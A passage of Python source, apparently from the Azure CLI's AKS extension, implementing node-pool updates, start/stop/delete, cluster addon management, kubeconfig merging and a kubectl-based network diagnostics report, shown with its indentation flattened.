no_wait=False):
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
if (update_autoscaler != 1 and not tags and not scale_down_mode and not mode and not max_surge and labels is None and node_taints is None):
reconcilePrompt = 'no argument specified to update would you like to reconcile to current settings?'
if not prompt_y_n(reconcilePrompt, default="n"):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge" or "--scale-down-mode" or "--labels" or "--node-taints')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
if node_taints is not None:
taints_array = []
if node_taints != '':
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise InvalidArgumentValueError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
instance.node_taints = taints_array
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning(
'Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if scale_down_mode is not None:
instance.scale_down_mode = scale_down_mode
if mode is not None:
instance.mode = mode
if labels is not None:
instance.node_labels = labels
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_stop(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
aks_custom_headers=None,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise InvalidArgumentValueError(
"Node pool {} doesnt exist, use 'aks nodepool list' to get current node pool list".format(nodepool_name))
instance = client.get(resource_group_name, cluster_name, nodepool_name)
power_state = PowerState(code="Stopped")
instance.power_state = power_state
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_start(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
aks_custom_headers=None,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise InvalidArgumentValueError(
"Node pool {} doesnt exist, use 'aks nodepool list' to get current node pool list".format(nodepool_name))
instance = client.get(resource_group_name, cluster_name, nodepool_name)
power_state = PowerState(code="Running")
instance.power_state = power_state
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
ignore_pod_disruption_budget=None,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name, ignore_pod_disruption_budget=ignore_pod_disruption_budget)
def aks_addon_list_available():
available_addons = []
for k, v in ADDONS.items():
available_addons.append({
"name": k,
"description": ADDONS_DESCRIPTIONS[v]
})
return available_addons
def aks_addon_list(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
addon_profiles = client.get(resource_group_name, name).addon_profiles
current_addons = []
for name, addon in ADDONS.items():
if not addon_profiles or addon not in addon_profiles:
current_addons.append({
"name": name,
"api_key": addon,
"enabled": False
})
else:
current_addons.append({
"name": name,
"api_key": addon,
"enabled": addon_profiles[addon].enabled
})
return current_addons
def aks_addon_show(cmd, client, resource_group_name, name, addon): # pylint: disable=unused-argument
addon_profiles = client.get(resource_group_name, name).addon_profiles
addon_key = ADDONS[addon]
if not addon_profiles or addon_key not in addon_profiles or not addon_profiles[addon_key].enabled:
raise CLIError(f'Addon "{addon}" is not enabled in this cluster.')
return {
"name": addon,
"api_key": addon_key,
"config": addon_profiles[addon_key].config,
"identity": addon_profiles[addon_key].identity
}
def aks_addon_enable(cmd, client, resource_group_name, name, addon, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None,
no_wait=False, enable_msi_auth_for_monitoring=False):
return enable_addons(cmd, client, resource_group_name, name, addon, workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name, appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix,
appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace, enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring)
def aks_addon_disable(cmd, client, resource_group_name, name, addon, no_wait=False):
return aks_disable_addons(cmd, client, resource_group_name, name, addon, no_wait)
def aks_addon_update(cmd, client, resource_group_name, name, addon, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None,
no_wait=False, enable_msi_auth_for_monitoring=False):
addon_profiles = client.get(resource_group_name, name).addon_profiles
addon_key = ADDONS[addon]
if not addon_profiles or addon_key not in addon_profiles or not addon_profiles[addon_key].enabled:
raise CLIError(f'Addon "{addon}" is not enabled in this cluster.')
return enable_addons(cmd, client, resource_group_name, name, addon, check_enabled=False,
workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name, appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix,
appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace, enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
try:
if addons == "monitoring" and CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled and \
CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
# remove the DCR association because otherwise the DCR can't be deleted
ensure_container_insights_for_monitoring(
cmd,
instance.addon_profiles[CONST_MONITORING_ADDON_NAME],
subscription_id,
resource_group_name,
name,
instance.location,
remove_monitoring=True,
aad_route=True,
create_dcr=False,
create_dcra=True
)
except TypeError:
pass
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None, no_wait=False, enable_msi_auth_for_monitoring=False):
instance = client.get(resource_group_name, name)
# this is overwritten by _update_addons(), so the value needs to be recorded here
msi_auth = True if instance.service_principal_profile.client_id == "msi" else False
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id, enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring, subnet_name=subnet_name,
appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper, enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait)
if CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled:
if CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
if not msi_auth:
raise ArgumentUsageError(
"--enable-msi-auth-for-monitoring can not be used on clusters with service principal auth.")
else:
# create a Data Collection Rule (DCR) and associate it with the cluster
ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=True, create_dcr=True, create_dcra=True)
else:
# monitoring addon will use legacy path
ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=False)
monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in instance.addon_profiles:
enable_virtual_node = True
need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
client.begin_create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if monitoring and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
# All agent pool will reside in the same vnet, we will grant vnet level Contributor role
# in later function, so using a random agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
# Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
# we don't need to handle it in client side in this case.
else:
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, name, instance)
return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, # pylint: disable=too-many-branches,too-many-statements
instance,
subscription_id,
resource_group_name,
name,
addons,
enable,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
subnet_name=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
no_wait=False): # pylint: disable=unused-argument
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
logAnalyticsConstName = CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = sanitize_loganalytics_ws_resource_id(
workspace_resource_id)
addon_profile.config = {
logAnalyticsConstName: workspace_resource_id}
addon_profile.config[CONST_MONITORING_USING_AAD_MSI_AUTH] = enable_msi_auth_for_monitoring
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError(
'The aci-connector addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The open-service-mesh addon is already enabled for this managed cluster.\n'
'To change open-service-mesh configuration, run '
f'"az aks disable-addons -a open-service-mesh -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The confcom addon is already enabled for this managed cluster.\n'
'To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
elif addon == CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The azure-keyvault-secrets-provider addon is already enabled for this managed cluster.\n'
'To change azure-keyvault-secrets-provider configuration, run '
f'"az aks disable-addons -a azure-keyvault-secrets-provider -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if disable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "false"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP profile because otherwise validation complains
instance.service_principal_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_os_options(cmd, client, location): # pylint: disable=unused-argument
return client.get_os_options(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError(
'failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(
stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(
cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(
cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id,
resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
for _, diag_setting in enumerate(diag_settings):
if diag_setting:
return diag_setting.storage_account_id
print("No diag settings specified")
return None
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning(
"Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster',
str(len(ready_nodes)))
if not ready_nodes:
logger.warning(
'No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get",
"apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s',
node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s',
node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads(
'[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(
network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
def get_aks_custom_headers(aks_custom_headers=None):
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
raise CLIError('custom headers format is incorrect')
headers[parts[0]] = parts[1]
return headers
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
# some addons require post cluster creation role assigment
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(client.begin_create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if need_grant_vnet_permission_to_cluster_identity:
if not create_role_assignment(cmd.cli_ctx, 'Network Contributor',
cluster.identity.principal_id, scope=vnet_subnet_id,
resolve_assignee=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach '
'acr to it, you can manually grant permission to the identity '
'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
'it permission to pull from ACR.')
else:
kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
else:
cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
return cluster
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or managed_cluster.identity.type.casefold() == "userassigned"))
def _get_message_of_the_day(file_path):
if not os.path.isfile(file_path):
raise CLIError(
"{} is not valid file, or not accessable.".format(file_path))
content = read_file_content(file_path)
if not content:
raise ArgumentUsageError(
"message of the day should point to a non-empty file if specified.")
content = base64.b64encode(bytes(content, 'ascii')).decode('ascii')
return content
def _get_kubelet_config(file_path):
if not os.path.isfile(file_path):
raise CLIError(
"{} is not valid file, or not accessable.".format(file_path))
kubelet_config = get_file_json(file_path)
if not isinstance(kubelet_config, dict):
raise CLIError(
"Error reading kubelet configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = KubeletConfig()
config_object.cpu_manager_policy = kubelet_config.get(
"cpuManagerPolicy", None)
config_object.cpu_cfs_quota = kubelet_config.get("cpuCfsQuota", None)
config_object.cpu_cfs_quota_period = kubelet_config.get(
"cpuCfsQuotaPeriod", None)
config_object.image_gc_high_threshold = kubelet_config.get(
"imageGcHighThreshold", None)
config_object.image_gc_low_threshold = kubelet_config.get(
"imageGcLowThreshold", None)
config_object.topology_manager_policy = kubelet_config.get(
"topologyManagerPolicy", None)
config_object.allowed_unsafe_sysctls = kubelet_config.get(
"allowedUnsafeSysctls", None)
config_object.fail_swap_on = kubelet_config.get("failSwapOn", None)
